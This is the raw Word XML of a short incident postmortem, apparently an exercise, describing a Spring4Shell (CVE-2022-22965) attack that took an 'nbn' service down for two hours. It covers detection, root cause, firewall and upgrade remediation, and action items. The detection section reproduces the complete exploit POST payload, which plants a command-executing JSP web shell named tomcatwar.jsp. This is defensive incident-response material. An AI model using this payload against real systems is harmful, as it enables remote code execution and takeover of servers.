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9542" w14:textId="20BE7A3B" w:rsidR="00625158" w:rsidRDefault="00625158" w:rsidP="00625158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Incident Postmortem:</w:t>
      </w:r>
      <w:r w:rsidR="00E33E48" w:rsidRPr="00E33E48">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E33E48">
        <w:t xml:space="preserve"> attack using CVE-2022-22965</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D6ADBC" w14:textId="77777777" w:rsidR="00625158" w:rsidRDefault="00625158" w:rsidP="00625158">
      <w:pPr>
        <w:pStyle w:val="Heading2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69456756" w14:textId="32E19805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At &lt;2022-03-20T03:16:34Z&gt; the SOC logs detected an ongoing attack with a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 xml:space="preserve">P1 – Critical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>priority</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E07D936" w14:textId="62FAF260" w:rsidR="002C40A0" w:rsidRDefault="002C40A0" w:rsidP="002C40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ccording to the previous investigation, it was caused by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zero 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 exploit known as Spring4Shell CVE-2022-22965</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404767B" w14:textId="77777777" w:rsidR="002C40A0" w:rsidRDefault="002C40A0" w:rsidP="002C40A0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000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the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>nbn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Team was alerted that the ongoing attack was affecting the services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C77F82" w14:textId="37BE8BC3" w:rsidR="002C40A0" w:rsidRDefault="002C40A0" w:rsidP="002C4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Infrastructure name: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>NBN Connection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  <w:t xml:space="preserve">Network hostname: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>nbn.external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  <w:t>.network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</w:r>
    </w:p>
    <w:p w14:paraId="5ED14604" w14:textId="77777777" w:rsidR="002C40A0" w:rsidRDefault="002C40A0" w:rsidP="002C4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AU" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CFDD96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Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D46FD" w14:textId="2FA4586B" w:rsidR="002C40A0" w:rsidRPr="002C40A0" w:rsidRDefault="002C40A0" w:rsidP="002C40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Due to the attack the services were down. For 2 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F43B5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Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025568A6" w14:textId="42E4B79A" w:rsidR="00625158" w:rsidRDefault="002C40A0" w:rsidP="00625158">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The log detected ongoing POST request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8FC09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highlight w:val="yellow"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>: "suffix=%&gt;//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F498D5B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c1=Runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C0BCB7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c2=&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44149E9C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DNT=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66159053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Content-Type=application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644EAF32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39A3F259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highlight w:val="yellow"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>DATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61950A5C" w14:textId="77777777" w:rsidR="002C40A0" w:rsidRDefault="002C40A0" w:rsidP="002C40A0">
      <w:pPr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class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&amp;class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&amp;class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&amp;class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBB56F2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24E703AE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</w:p>
    <w:p w14:paraId="4D84DDC3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highlight w:val="yellow"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>tryining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to use the client request path:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C5A7A" w14:textId="77777777" w:rsidR="002C40A0" w:rsidRDefault="002C40A0" w:rsidP="002C40A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lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-AU" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>tomcatwar.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35C71C2F" w14:textId="77777777" w:rsidR="002C40A0" w:rsidRDefault="002C40A0" w:rsidP="00625158">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219C5F6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Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0703D320" w14:textId="7CF18BA4" w:rsidR="00625158" w:rsidRDefault="00E37881" w:rsidP="00E37881">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37881">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerability is caused by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E37881">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>getCachedIntrospectionResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E37881">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> method of the Spring framework wrongly exposing the class object when binding the parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A677CC1" w14:textId="705F310E" w:rsidR="00E37881" w:rsidRDefault="00E37881" w:rsidP="00E37881">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C736A9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Resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F096AC" w14:textId="091517C6" w:rsidR="00A65240" w:rsidRDefault="00A65240" w:rsidP="00A6524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a firewall rule was implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED1C8B7" w14:textId="43B48B7F" w:rsidR="00A65240" w:rsidRDefault="00A65240" w:rsidP="00A65240">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000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And systems upgraded according to the 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CVE-2022-22965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report</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3AAB1740" w14:textId="77777777" w:rsidR="00A65240" w:rsidRDefault="00A65240" w:rsidP="00A652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1382132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Action Items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88C2D8" w14:textId="41CE8D11" w:rsidR="00A65240" w:rsidRDefault="00A65240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Look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cve’s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vulnerabilities reported that could affect the systems used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165F22E" w14:textId="19942E41" w:rsidR="001803AB" w:rsidRDefault="001803AB" w:rsidP="00A65240">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001803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6CCA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6B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96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F5E68"/>
    <w:rsid w:val="001803AB"/>
    <w:rsid w:val="002C40A0"/>
    <w:rsid w:val="005A4250"/>
    <w:rsid w:val="00625158"/>
    <w:rsid w:val="00A65240"/>
    <w:rsid w:val="00E33E48"/>
    <w:rsid w:val="00E3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180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2022-03-23T19:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-24T03:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>